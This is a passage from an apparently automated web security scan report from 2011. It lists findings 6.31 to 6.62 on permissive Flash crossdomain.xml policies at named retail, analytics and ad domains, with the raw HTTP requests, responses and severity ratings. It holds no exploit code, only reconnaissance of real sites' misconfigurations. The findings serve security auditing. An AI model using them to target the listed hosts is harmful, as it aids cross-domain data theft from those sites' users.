Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

6.31. http://media.gnc.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media.gnc.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: media.gnc.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:34 GMT
Server: Apache/1.3.37 (Unix)
P3P: policyref="http://media.gnc.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Cache-Control: public, max-age=18000
Expires: Mon, 16 May 2011 06:58:34 GMT
Last-Modified: Wed, 06 Oct 2004 16:26:56 GMT
ETag: "c9-41641cd0"
Accept-Ranges: bytes
Content-Length: 201
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.32. http://media.gsimedia.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media.gsimedia.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: media.gsimedia.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:56:28 GMT
Server: Apache/1.3.37 (Unix)
P3P: policyref="http://media.gsimedia.net/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Cache-Control: public, max-age=18000
Expires: Mon, 16 May 2011 06:56:28 GMT
Last-Modified: Wed, 06 Oct 2004 16:26:56 GMT
ETag: "c9-41641cd0"
Accept-Ranges: bytes
Content-Length: 201
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.33. http://media2.legacy.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media2.legacy.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: media2.legacy.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/xml
Content-Length: 111

<?xml version="1.0" ?><cross-domain-policy><allow-access-from domain="*" secure="true" /></cross-domain-policy>

6.34. http://metrics.brookstone.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.brookstone.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.brookstone.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:02:55 GMT
Server: Omniture DC/2.0.0
xserver: www287
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.35. http://metrics.ftd.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.ftd.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.ftd.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:37 GMT
Server: Omniture DC/2.0.0
xserver: www400
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.36. http://metrics.gnc.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.gnc.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.gnc.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:43 GMT
Server: Omniture DC/2.0.0
xserver: www402
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.37. http://metrics.mcafee.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.mcafee.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.mcafee.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:06:39 GMT
Server: Omniture DC/2.0.0
xserver: www295
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.38. http://metrics.pacsun.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.pacsun.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.pacsun.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:00:28 GMT
Server: Omniture DC/2.0.0
xserver: www23
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.39. http://metrics.petsmart.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.petsmart.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.petsmart.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:15 GMT
Server: Omniture DC/2.0.0
xserver: www500
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.40. http://mlarmani.122.2o7.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mlarmani.122.2o7.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: mlarmani.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:02 GMT
Server: Omniture DC/2.0.0
xserver: www80
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.41. http://o.toshibadirect.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://o.toshibadirect.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: o.toshibadirect.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:56:41 GMT
Server: Omniture DC/2.0.0
xserver: www378
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.42. http://pix04.revsci.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Mon, 16 May 2011 02:02:16 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.43. http://r.turn.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://r.turn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Mon, 16 May 2011 01:56:38 GMT
Content-Type: text/xml;charset=UTF-8
Date: Mon, 16 May 2011 01:56:38 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

6.44. http://rpt.footlocker.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://rpt.footlocker.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: rpt.footlocker.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:00:27 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT
ETag: "16d800-c7-4758765f"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=300, max=998
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.45. http://s.xp1.ru4.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s.xp1.ru4.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: s.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 16 May 2011 01:57:55 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/xml
Last-modified: Mon, 22 Nov 2010 21:31:41 GMT
Content-length: 202
Etag: "ca-4ceae13d"
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

6.46. http://secure-us.imrworldwide.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://secure-us.imrworldwide.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:00:14 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Mon, 23 May 2011 02:00:14 GMT
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
ETag: "10c-482a467d"
Accept-Ranges: bytes
Content-Length: 268
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

6.47. http://segment-pixel.invitemedia.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://segment-pixel.invitemedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 16 May 2011 01:54:22 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.48. http://server.bhphotovideo.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://server.bhphotovideo.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: server.bhphotovideo.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:00 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT
ETag: "3a990e-c7-4758765f"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=300, max=978
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.49. http://sv.liveclicker.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sv.liveclicker.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: sv.liveclicker.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:59:03 GMT
Server: Apache
Last-Modified: Mon, 04 Jan 2010 21:03:13 GMT
ETag: "111db0-13e-ca84640"
Accept-Ranges: bytes
Content-Length: 318
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" to-ports="*" secure="false" />
...[SNIP]...

6.50. http://tags.mediaforge.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tags.mediaforge.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.mediaforge.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Date: Mon, 16 May 2011 01:53:12 GMT
P3P: policyref="/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
Server: nginx/0.8.53
Set-Cookie: uID=CqpSnE3Qg4hGhAOdC2IDAg==; expires=Tue, 15-May-12 01:53:12 GMT; domain=.mediaforge.com; path=/
Content-Length: 269
Connection: Close

<cross-domain-policy xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><allow-access-from domain="*"/><site-control
...[SNIP]...

6.51. http://uat.netmng.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://uat.netmng.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: uat.netmng.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:38 GMT
Server: Apache/2.2.9
Last-Modified: Fri, 07 May 2010 14:42:29 GMT
ETag: "6c1d1-6a-4860211879f40"
Accept-Ranges: bytes
Content-Length: 106
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.52. http://wasc.homedepot.ca/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wasc.homedepot.ca
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: wasc.homedepot.ca

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:11 GMT
Server: Omniture DC/2.0.0
xserver: www8
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.53. http://www.mapquestapi.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mapquestapi.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mapquestapi.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"276-1302871693000"
Last-Modified: Fri, 15 Apr 2011 12:48:13 GMT
Content-Type: application/xml
Content-Length: 276
Date: Mon, 16 May 2011 01:53:40 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" /
...[SNIP]...
<allow-access-from domain="*" secure="true"/>
...[SNIP]...

6.54. http://www26.orientaltrading.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www26.orientaltrading.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www26.orientaltrading.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:11 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT
ETag: "29b86a-c7-4758765f"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=300, max=915
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.55. http://ace.imageg.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ace.imageg.net
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ace.imageg.net

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 14 Oct 2010 08:47:00 GMT
ETag: "4e411c-2ba-4928fc0d4e900"
X-UA-Compatible: IE=EmulateIE7
Content-Type: application/xml
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 10:47:27 GMT
Date: Mon, 16 May 2011 10:47:27 GMT
Content-Length: 698
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.acehardware.com" />

...[SNIP]...
<allow-access-from domain="*.gspt.net" />
<allow-access-from domain="*.gsipartners.com" />
<allow-access-from domain="preview.gsipartners.com" />
<allow-access-from domain="172.20.1.195" />
<allow-access-from domain="172.21.1.195" />
<allow-access-from domain="206.16.220.195" />
<allow-access-from domain="63.240.110.195" />
<allow-access-from domain="*.fetchback.com"/>
...[SNIP]...

6.56. http://ads.adbrite.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.adbrite.com

Response

HTTP/1.0 200 OK
Accept-Ranges: none
Content-Type: text/x-cross-domain-policy
Date: Mon, 16 May 2011 01:55:16 GMT
Server: XPEHb/1.0
Content-Length: 398
Connection: close

<?xml version="1.0" encoding="UTF-8"?>

<cross-domain-policy>
<allow-access-from domain="*.adbrite.com" secure="true" />
<allow-access-from domain="www.adbrite.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.britepic.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.britepic.com" secure="true" />
...[SNIP]...

6.57. http://ads.al.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ads.al.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.al.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:02:59 GMT
Server: Apache/2.0.63 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Tue, 20 Jul 2010 15:58:07 GMT
ETag: "2013b-284-c045c1c0"
Accept-Ranges: bytes
Content-Length: 644
Keep-Alive: timeout=2
Connection: Keep-Alive
Content-Type: text/xml
Set-Cookie: NSC_mc-pbt-qspe=ffffffff090d165f45525d5f4f58455e445a4a423660;expires=Mon, 16-May-2011 02:12:59 GMT;path=/;httponly

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*.adinterax.com"/>
<allow-access-from domain="*.vidavee.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="*.theplatform.com"/>
<allow-access-from domain="*.edgesuite.net"/>
<allow-access-from domain="*.edgecast.net"/>
<allow-access-from domain="*.advance.net"/>
<allow-access-from domain="*.tremormedia.com"/>
<allow-access-from domain="*.adserver.adtechus.com"/>
<allow-access-from domain="*.adserver.adtech.de"/>
...[SNIP]...

6.58. http://feeds.bbci.co.uk/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://feeds.bbci.co.uk
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=109
Expires: Mon, 16 May 2011 10:42:55 GMT
Date: Mon, 16 May 2011 10:41:06 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

6.59. http://gnc.imageg.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://gnc.imageg.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: gnc.imageg.net

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 14 Oct 2010 08:47:00 GMT
ETag: "6781c1-195-4928fc0d4e900"
X-UA-Compatible: IE=EmulateIE7
Content-Type: application/xml
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 01:57:42 GMT
Date: Mon, 16 May 2011 01:57:42 GMT
Content-Length: 405
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="gnc.com" />
<allow-acce
...[SNIP]...
<allow-access-from domain="*.gspt.net" />
<allow-access-from domain="*.gsipartners.com" />
<allow-access-from domain="*.fetchback.com"/>
...[SNIP]...

6.60. http://googleads.g.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sun, 15 May 2011 10:45:15 GMT
Expires: Mon, 16 May 2011 10:45:15 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 54640
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.61. http://images.scanalert.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://images.scanalert.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: images.scanalert.com

Response

HTTP/1.0 200 OK
Server: McAfeeSecure
ETag: "EKdW2Rg2Poz"
Last-Modified: Wed, 03 Sep 2008 18:43:59 GMT
Accept-Ranges: bytes
Content-Type: text/xml; charset=utf-8
Content-Length: 116
Date: Mon, 16 May 2011 02:06:37 GMT
Connection: close
Cache-Control: private

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.scanalert.com"/>
</cross-domain-policy>

6.62. http://images3.pacsun.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://images3.pacsun.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: images3.pacsun.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"25343-1305036218000"
Last-Modified: Tue, 10 May 2011 14:03:38 GMT
Content-Type: application/xml
Content-Length: 25343
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:23 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.laneventure.com"/>
<allow-access-from domain="*.pearsonco.com"/>
<allow-access-from domain="*.targetimg1.com"/>
<allow-access-from domain="*.targetimg2.com"/>
<allow-access-from domain="*.targetimg3.com"/>
<allow-access-from domain="*.agilent.com"/>
<allow-access-from domain="*.artvan.com"/>
<allow-access-from domain="*.mizunogolf.com"/>
<allow-access-from domain="*.talbots.com"/>
<allow-access-from domain="giftadvisor.indelible.tv"/>
<allow-access-from domain="*.taaz.com"/>
<allow-access-from domain="www.flashmaxx.com"/>
<allow-access-from domain="flashmaxx.com"/>
<allow-access-from domain="searsfb.indelible.tv"/>
<allow-access-from domain="*.armstrong.com"/>
<allow-access-from domain="ag2010.stage.ascedia.com"/>
<allow-access-from domain="sassomedia.com"/>
<allow-access-from domain="*.photoshop.com"/>
<allow-access-from domain="kijones.host.adobe.com"/>
<allow-access-from domain="ag2010.stage.ascedia.com"/>
<allow-access-from domain="*.trex.com"/>
<allow-access-from domain="*.trexco.com"/>
<allow-access-from domain="*.vermontcountrystore.com"/>
<allow-access-from domain="*.pabng.com"/>
<allow-access-from domain="s7sps3.scene7.com"/>
<allow-access-from domain="*.morrowsnowboards.com"/>
<allow-access-from domain="*.k2admin.com"/>
